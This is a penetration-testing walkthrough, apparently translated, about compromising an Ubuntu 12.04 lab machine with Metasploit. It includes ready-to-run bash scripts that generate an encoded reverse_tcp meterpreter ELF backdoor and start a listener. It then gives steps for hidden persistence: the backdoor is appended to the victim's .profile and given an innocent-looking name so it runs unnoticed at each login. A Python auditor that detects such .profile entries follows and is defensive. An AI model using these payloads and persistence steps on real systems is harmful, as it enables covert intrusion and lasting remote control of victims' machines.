Metasploit penetration testing of Ubuntu 12.04 (1)
This article is mainly a practice exercise. It shares the attack details, including some scripts collected from various sources and modified by the original author; the penetration process itself is not the focus. The main reason for writing it up is that the second half, on persistence, is still worth learning from. Along the way you can also refamiliarize yourself with the MSF framework. I hope it helps.
Attack environment:
Ubuntu 12.04 LTS 32-bit (target, default software installation and configuration)
VirtualBox
Metasploit framework (latest version)
Debian Squeeze 64-bit (attacker)
First, we prepare a simple bash script that generates the ELF binary executable, so the later steps become much easier. Place the script in the Metasploit home directory:
```bash
#!/bin/bash
clear
echo "************************************************"
echo "   LINUX ELF BINARY GENERATOR FOR METASPLOIT   *"
echo "************************************************"
echo -e "What IP are we gonna use ex. 192.168.0.1? \c"
read IP
echo -e "What Port Number are we gonna listen to? : \c"
read port
# Generate a reverse_tcp meterpreter payload, encode it and write it out as an ELF file
./msfpayload linux/x86/meterpreter/reverse_tcp LHOST=$IP LPORT=$port R | ./msfencode -t elf -e x86/shikata_ga_nai >> Executive
echo "Executive binary generated.."
chmod u=rwx Executive
ls -la Executive
```
After running the script and answering its two prompts, we have a binary executable named Executive.
Next, we need to start a listener on the attacker and wait for the target to connect back, because we are using a reverse backdoor! To keep things simple (and look cool doing it), I wrote another bash script and also put it in the Metasploit home directory:
```bash
#!/bin/bash
clear
echo "*********************************************"
echo "   METASPLOIT LINUX METERPRETER LISTENER    *"
echo "*********************************************"
echo "Here is a network device list available on your machine"
cat /proc/net/dev | tr -s ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "What network interface are we gonna use ? \c"
read interface
echo -e "What Port Number are we gonna listen to? : \c"
read port
# Get OS name
OS=`uname`
IP="" # store IP
case $OS in
  Linux) IP=`/sbin/ifconfig $interface | grep 'inet addr:' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1 }'`;;
  *) IP="Unknown";;
esac
echo " starting the meterpreter listener.."
./msfcli exploit/multi/handler PAYLOAD=linux/x86/meterpreter/reverse_tcp LHOST=$IP LPORT=$port E
```
Okay, the listener is ready. Next the backdoor has to be delivered to the Ubuntu target, which in practice can be done in all sorts of tedious ways. Since this is an exercise, we simply copy the ELF file onto the victim machine and run it there.
Now we have executed this unknown binary on the target. Double-clicking the file produces no visible response (which is exactly what a backdoor wants), but the listener on our attacker already shows the result:
What then? We now have a meterpreter shell, but how do we get root? The next step is the most interesting part: we will place a backdoor file in the target's home directory and modify the .profile file so that our backdoor is executed every time the target starts. To do this, we first download the target's .profile file:
We add a small line to the file so that every login executes our backdoor. Here we append ./executive (the generated backdoor's file name; you could pick a more innocent-looking name such as sys.conf, but make sure the file carries the executable (+x) permission).
Then we send the modified .profile file back to the target.
Next, we upload our ELF binary to the target's home directory and rename it to executive, making sure it has rwx permissions.
Now we have a simple persistent backdoor. Every time the target starts up we get a shell back, and the file runs silently without anyone noticing.
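From the defender's side, the .profile trick above is easy to audit. The following script is added here as an example and is not code from the original article: it scans the login files in a home directory for lines whose command is a file under that same home directory and reports whether the target is actually executable (only then does the entry fire); the sample .profile it checks is constructed for the demo.

```python
import os, re, tempfile
from pathlib import Path

# Files a login shell reads; the walkthrough appends its entry to .profile.
LOGIN_FILES = (".profile", ".bash_profile", ".bash_login", ".bashrc")
# Command word is a path under the home directory: ./x, ~/x, $HOME/x, /home/u/x
HOME_EXEC = re.compile(r'^(?:\./|~/|\$HOME/|/home/[^/\s]+/)(\S+)')

# Constructed sample .profile: Ubuntu defaults plus two appended lines.
SAMPLE_PROFILE = """# ~/.profile: executed by the command interpreter for login shells.
. "$HOME/.bashrc"
PATH="$HOME/bin:$PATH"
./executive
$HOME/.cache/sys.conf &
"""

def suspicious_lines(text):
    """(line_no, line, target) for non-comment lines whose command is a home-dir file."""
    hits = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue                      # comments, blank lines
        m = HOME_EXEC.match(line)         # sourcing (". file") and VAR= lines do not match
        if m:
            hits.append((no, line, m.group(1)))
    return hits

def audit_home(home):
    """Scan one home dir; record whether each target is an executable file."""
    home, findings = Path(home), []
    for name in LOGIN_FILES:
        f = home / name
        if not f.is_file():
            continue
        for no, line, target in suspicious_lines(f.read_text(errors="replace")):
            path = home / target
            findings.append({"file": name, "line": no, "cmd": line,
                             "executable": path.is_file() and os.access(path, os.X_OK)})
    return findings

def demo():
    """Audit a throwaway home directory holding the constructed sample."""
    with tempfile.TemporaryDirectory() as home:
        (Path(home) / ".profile").write_text(SAMPLE_PROFILE)
        exe = Path(home) / "executive"
        exe.write_bytes(b"\x7fELF")  # placeholder bytes, not a real binary
        exe.chmod(0o700)
        return audit_home(home)
```

Call `demo()` to see the two flagged entries; on a real host, run `audit_home` over each directory under /home and treat an executable hit with a non-package file as worth a closer look.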
Okay, that completes the first step of persistence. What can we do next?